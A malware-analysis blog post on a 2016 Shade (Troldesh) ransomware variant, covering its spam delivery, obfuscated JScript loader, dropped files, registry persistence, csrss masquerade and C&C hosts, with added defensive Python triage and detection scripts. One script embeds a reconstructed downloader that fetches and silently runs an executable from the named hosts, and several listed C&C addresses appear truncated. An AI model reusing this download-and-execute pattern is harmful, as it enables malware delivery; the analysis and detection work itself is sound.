The Shade (Troldesh) Ransomware: One More Soldier in the Army of Encryption Miscreants

Written by Mickael S. and Tanya K.

Last week, SenseCy analysts happened upon a new sample of Shade ransomware, also known as Troldesh, which appends a no_more_ransom extension to encrypted files. This ransomware is far from famous, lacking the glorious aura of its rivals, Locky and Cerber. The NoMoreRansom project released a decryption tool for Shade in the summer, but apparently it does not work on this new Shade variant, which makes it even more damaging than it was before.

This variant (which ironically uses a no_more_ransom extension) was delivered in a taxes-themed spam email message in Russian in early December 2016, and according to comments on Russian-language technical support forums, it became active in the last week of November. Interestingly, all the infection victims mentioned accounting-themed spam messages that led to the infection when inadvertently opened. Even more interestingly, the victims also reported that all their 1C (accounting software popular in Russia) databases were encrypted after the infection.

Ostensibly, this Shade variant targets mainly Russian users; however, the ransom message appears in English as well, suggesting possible future attacks outside Russia.

Our technical analysis revealed that the ransomware is delivered by a JavaScript loader attached to the spam email message, which uses the tried and trusted trick of embedding an Excel extension in the file name to confuse the user: file name_xls.js. With the default Windows setting that hides extensions of known file types, the attachment is displayed as file name_xls, and the real .js extension is only visible if the user has turned that setting off.

The script is heavily obfuscated, but we were still able to ascertain that it uses the notorious ActiveXObject, a JScript feature available in the Internet Explorer browser and in the Windows Script Host (which is what runs a double-clicked .js attachment), but not in Firefox or Chrome.

An excerpt of the obfuscated code:

Once the script is executed, it tries to download the malicious file from one of two sources: 195.238.172.21 (theacornalliance.org) or 5.187.2.119 (d-v.by). The downloaded file, helpconfig.exe, is then saved to the infected PC.
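The loader pattern described in the last few paragraphs (double-extension file name, ActiveXObject, download from a hard-coded host) can be triaged statically before anything is executed. The script below is an added example written for this page, not code from the SenseCy analysis or from the sample itself: it undoes two cheap obfuscation tricks (split string literals and \xNN escapes), then pulls out the ProgIDs, URLs, hosts and IPs and flags the file name. The JScript it runs on is a constructed stand-in built from the hosts and file name given above; the URL paths and the exact obfuscation are assumptions.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed stand-in for a JScript downloader of the kind described above. It is
# NOT the SenseCy sample; it only imitates two cheap obfuscation tricks (split
# string literals and \xNN escapes) so that normalize() has something to undo.
# The URL paths are invented; the hosts and file name come from the write-up.
SAMPLE_LOADER = r'''
var h = new ActiveXObject("MS" + "XML2." + "XML" + "HTTP");
var s = new ActiveXObject("\x41\x44\x4f\x44\x42.Stream");
var w = new ActiveXObject("WScr" + "ipt.Sh" + "ell");
var u = ["http://195.238.172.21/helpconfig.exe", "http://d-v.by/helpconfig.exe"];
h.open("GET", u[0], false); h.send();
s.Open(); s.Type = 1; s.Write(h.responseBody); s.SaveToFile("helpconfig.exe", 2);
w.Run("helpconfig.exe", 0);
'''

# One ProgID from each group is needed to download, write to disk and execute.
REQUIRED_GROUPS = [{"msxml2.xmlhttp", "microsoft.xmlhttp"}, {"adodb.stream"}, {"wscript.shell"}]

PROGID_RE = re.compile(r'ActiveXObject\(\s*"([^"]+)"\s*\)')
URL_RE = re.compile(r'https?://[^\s"\'<>]+')
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
# "invoice_xls.js", "report.pdf.exe": a document-looking token right before a script/PE extension.
DECEPTIVE_NAME_RE = re.compile(
    r'[._-](?:xls|xlsx|doc|docx|pdf)\.(?:js|jse|vbs|vbe|wsf|hta|exe|scr)$', re.I)


def normalize(js: str) -> str:
    """Decode \\xNN escapes and merge "a" + "b" literal concatenations so the regexes see whole strings."""
    js = re.sub(r'\\x([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), js)
    join = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')
    prev = None
    while prev != js:  # repeat until no adjacent literals are left to merge
        prev = js
        js = join.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', js)
    return js


@dataclass
class Triage:
    progids: list
    urls: list
    hosts: list
    ips: list
    suspicious_name: bool
    download_and_execute: bool


def triage(filename: str, js: str) -> Triage:
    clean = normalize(js)
    progids = sorted(set(PROGID_RE.findall(clean)))
    urls = sorted(set(URL_RE.findall(clean)))
    hosts = sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname})
    ips = sorted(set(IPV4_RE.findall(clean)))
    lowered = {p.lower() for p in progids}
    return Triage(
        progids=progids, urls=urls, hosts=hosts, ips=ips,
        suspicious_name=bool(DECEPTIVE_NAME_RE.search(filename)),
        # every capability group present -> classic download-and-execute loader
        download_and_execute=all(lowered & group for group in REQUIRED_GROUPS),
    )


if __name__ == "__main__":
    print(triage("invoice_xls.js", SAMPLE_LOADER))
```

Real samples use heavier obfuscation than this (string arrays, eval chains, charCode tables), so the normalisation step is the part that needs extending per family; the extraction and verdict logic stays the same once the strings are visible.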

GET request for the file helpconfig.exe from theacornalliance.org domain:

The file is dropped into the following path (the Internet Explorer/WinINet cache): %AppData%\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\643WD09Y\helpconfig[1].exe
In fact, helpconfig.exe is a Nullsoft (NSIS) installer in which the payload is embedded.
Once helpconfig.exe is executed, it extracts the following files:

  • %TEMP%\nsiAC44.tmp
  • %TEMP%\hal.gif
  • %TEMP%\wp-json
  • %TEMP%\home_mobile.png
  • %TEMP%\logo.gif
  • %TEMP%\wp-paginate.css
  • %TEMP%\printer.css
  • %TEMP%\svgeezy.min.js
  • %TEMP%\FzBOcU5n.1pptnUyaetCFUlk
  • %TEMP%\nsyACD2.tmp
  • %TEMP%\nsyACD2.tmp\pressure.dll

It also creates several registry entries:

  • config:
    • HKCU\Software\System32\Configuration\xi
    • HKCU\Software\System32\Configuration\xVersion

  • autostart:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem

It then creates a copy of itself and runs it under the name csrss, mimicking the legitimate Client Server Runtime Subsystem process (csrss.exe), a critical Windows process whose termination results in a Blue Screen of Death, so a look-alike with that name is less likely to be killed.
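The artefacts listed above (the HKCU\Software\System32\Configuration values, the Run entry named after a system process, and a csrss copy outside System32) are easy to check for on a suspect host. The script below is an added example written for this page, not code from the SenseCy analysis: it parses a registry export in reg.exe format and a process listing, and flags the three indicators. Both inputs are constructed from the entries quoted above; the path of the csrss copy, the placeholder value data and the assumption that %SystemRoot% is C:\Windows are mine, not from the write-up.

```python
import re
from typing import NamedTuple


class Finding(NamedTuple):
    kind: str
    detail: str


# Constructed reg.exe-style export built from the keys quoted above. The value
# data (placeholders, the csrss path under AppData\Roaming) is invented for the
# example; the key and value names are the ones reported for this variant.
REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\System32\Configuration]
"xi"="placeholder"
"xVersion"="placeholder"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Client Server Runtime Subsystem"="\"C:\\Users\\user\\AppData\\Roaming\\csrss.exe\""
'''

# Constructed (image name, full path) pairs as a process lister would report them.
PROCESS_LIST = [
    ("csrss.exe", r"C:\Windows\System32\csrss.exe"),
    ("csrss.exe", r"C:\Users\user\AppData\Roaming\csrss.exe"),
    ("explorer.exe", r"C:\Windows\explorer.exe"),
]

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
PERSISTENCE_NAME = "Client Server Runtime Subsystem"
SUSPECT_CONFIG_PREFIX = r"HKEY_CURRENT_USER\Software\System32"  # not a tree Windows itself uses
LEGIT_CSRSS = r"c:\windows\system32\csrss.exe"  # assumes %SystemRoot% is C:\Windows

_VALUE_LINE = re.compile(r'"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def parse_reg_export(text: str) -> dict:
    """Return {key_path: {value_name: data}} for the REG_SZ values of a reg.exe export."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            m = _VALUE_LINE.match(line)
            if m:
                # reg.exe escapes " as \" and \ as \\ inside REG_SZ data
                name, data = (s.replace('\\"', '"').replace('\\\\', '\\') for s in m.groups())
                keys[current][name] = data
    return keys


def check_registry(reg_text: str) -> list:
    findings = []
    for key, values in parse_reg_export(reg_text).items():
        k = key.lower()
        if k == RUN_KEY.lower():
            for name, data in values.items():
                # the value name itself is the lure; also catch any Run entry pointing at a csrss.exe
                if name.lower() == PERSISTENCE_NAME.lower() or "csrss.exe" in data.lower():
                    findings.append(Finding("run-key", f"{name} -> {data}"))
        elif k.startswith(SUSPECT_CONFIG_PREFIX.lower()):
            findings.append(Finding("config-key", key))
    return findings


def check_processes(procs) -> list:
    # the only legitimate csrss.exe lives in System32; anything else with that name is a masquerade
    return [Finding("csrss-masquerade", path) for name, path in procs
            if name.lower() == "csrss.exe" and path.lower() != LEGIT_CSRSS]


if __name__ == "__main__":
    for f in check_registry(REG_EXPORT) + check_processes(PROCESS_LIST):
        print(f"{f.kind}: {f.detail}")
```

On a live host the same checks map onto `reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg` and a process list with full image paths; note that the real csrss.exe runs as SYSTEM, so a csrss.exe under a user profile is a second, independent tell.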

After these steps, the malware tries to connect to several C&C servers (some of which are Tor nodes):

  • 25.193.9 (ehlo.4711.se) – a TOR node
  • 73.17.194 (turtles.fscked.org)
  • 35.32.5  (faravahar.rabbani.jp)
  • 31.0.39 (belegost.csail.mit.edu)
  • 83.223.34 (rgnx.net) – a TOR node

At this point, the encryption process starts.
The encryption message:

In the README.txt file, the victim is instructed to contact lukyan.sazonov26[at]gmail.com to receive further instructions. This email address was previously associated with the Da Vinci ransomware, which served as inspiration for Shade ransomware.

If no reply is received from this address within 48 hours, the victim is instructed to fill out a contact form located on the Tor network:
